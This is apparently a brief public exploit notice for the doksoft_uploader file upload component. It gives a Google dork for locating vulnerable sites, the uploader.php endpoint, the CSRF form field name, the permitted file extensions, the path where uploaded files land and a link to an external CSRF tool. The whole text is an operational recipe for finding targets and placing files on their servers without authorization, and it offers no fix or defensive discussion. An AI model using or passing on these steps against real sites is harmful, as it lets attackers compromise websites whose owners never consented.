Dork: inurl:/doksoft_uploader/userfiles/
Author: L4663r666h05t
Thanks: Bivokids - Manadoghost - Indonesian Code Party
Exploit: /doksoft_uploader/uploader.php?type=Files
CSRF post files: files[]
Allowed files extension:
7z, aiff, asf, avi, bmp, csv, doc, docx, fla
flv, gif, gz, gzip, jpeg, jpg, mid, mov, mp3
mp4, mpc, mpeg, mpg, ods, odt, pdf, png, ppt
pptx, pxd, qt, ram, rar, rm, rmi, rmvb, rtf
sdc, sitd, swf, sxc, sxw, tar, tgz, tif, tiff
txt, vsd, wav, wma, wmv, xls, xlsx, zip
Path File: /doksoft_uploader/userfiles/files.jpg
CSRF: http://v1.exploits.my.id/?tools=csrf